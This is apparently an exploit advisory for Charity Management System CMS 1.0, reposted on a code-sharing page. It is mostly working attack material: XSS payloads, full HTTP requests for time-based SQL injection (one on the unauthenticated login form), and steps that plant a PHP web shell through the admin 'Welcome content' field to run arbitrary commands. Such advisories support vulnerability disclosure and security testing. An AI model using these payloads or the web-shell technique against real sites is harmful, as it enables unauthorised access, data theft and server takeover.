扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 |
# Exploit Title: Charity Management System CMS 1.0 - Multiple Vulnerabilities # Date: 18/08/2021 # Exploit Author: Davide 't0rt3ll1n0' Taraschi # Vendor Homepage: https://www.sourcecodester.com/users/tips23 # Software Link: https://www.sourcecodester.com/php/14908/simple-charity-website-management-system-cms-php-free-source-code.htmlpolice-crime-record-management-system.html # Version: 1.0 # Testeted on: Linux (Ubuntu 20.04) using LAMPP ## Unauthenticated reflected XSS # Vulnerable code in '/search.php' at line 44/45: <?php if($count_all <= 0): ?> <h4 class="text-center">No Article with "<?php echo $_GET['search'] ?>" keyword found.</h4> The content of the 'search' variable is printed on the page without being checked, leading to XSS # PoC Go to 'http://site.com/charity/' and in the search box input "<svg onload=alert(document.domain)>" without the double quotes, and a text box should appear ## Authenticated stored XSS There is a stored XSS in '/charity/admin/maintenance/manage_topic.php' due to a failure to sanitize user input # Poc 1) Login as admin 2) Go to '/maintenance/manage_topic.php' 3) In "description" insert "<svg onload=alert(document.domain)>" without the double quotes 4) Click the "save" below 5) An alert box should appear ## POST Authenticated SQL Injection # Vulnerable code in '/charity/classes/Master.php' at line 67 $del = $this->conn->query("DELETE FROM <code>topics</code> where id = '{$id}'"); The $id variable is used without being checked, leading to SQLi # PoC Request: POST /charity/classes/Master.php?f=delete_topic HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 4 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/charity/admin/?page=maintenance/topics Cookie: PHPSESSID=de17186191c1cbdeb6e815ea8c21103f Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- foo Response after 5 seconds (the sleep has been executed) HTTP/1.1 200 OK Date: Wed, 18 Aug 2021 14:32:13 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1 X-Powered-By: PHP/7.4.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 {"status":"success"} ## GET Authenticated SQL Injection # Vulnerable code in '/charity/admin/maintenance/manage_topic.php' at line 2/3 if(isset($_GET['id']) && $_GET['id'] > 0){ $qry = $conn->query("SELECT * from <code>topics</code> where id = '{$_GET['id']}' "); ... } As usual the 'id' variable is passed to the prepared statement without being checked, leading to (another) SQLi # PoC Similar to the previous one (same payload) ## POST Unauthenticated SQL Injection # Vulnerable code in '/charity/classes/Login.php' at line 21 $qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') "); The 'username' variable is passed without being sanificated, causing a SQLi # PoC Request: POST /charity/classes/Login.php?f=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 84 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/charity/admin/login.php Cookie: PHPSESSID=de17186191c1cbdeb6e815ea8c21103f Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin username=username' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- foo&password=password Response after 5 seconds (the sleep has been executed) HTTP/1.1 200 OK Date: Wed, 18 Aug 2021 14:48:18 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1 X-Powered-By: PHP/7.4.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 164 Connection: close Content-Type: text/html; charset=UTF-8 {"status":"incorrect","last_qry":"SELECT * from users where username = 'username' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- foo' and password = md5('password') "} ## PHP Code Injection lead to Authenticated Remote Code Execution (RCE) # Vulnerable code in /charity/classes/SystemSettings.php at line 37 $qry = $this->conn->query("UPDATE system_info set meta_value = '{$value}' where meta_field = '{$key}' "); The 'value' variable will be included in the homepage of the site without being checked, leading to RCE. # PoC 1) Go to /charity/admin/system_info.php and in the "Welcome content" click on "Code View" at the top right. 2) At the bottom of the html code enter the following code: <?php if(isset($_GET['cmd'])) {system($_GET['cmd']);} ?> 3) Click the "update" button 4) Go to the home page and at the end of the url tipe "?cmd=$cmd" without the double quotes and replacing $cmd with the command you want to execute 5) The output should appear in the homepage |
体验盒子
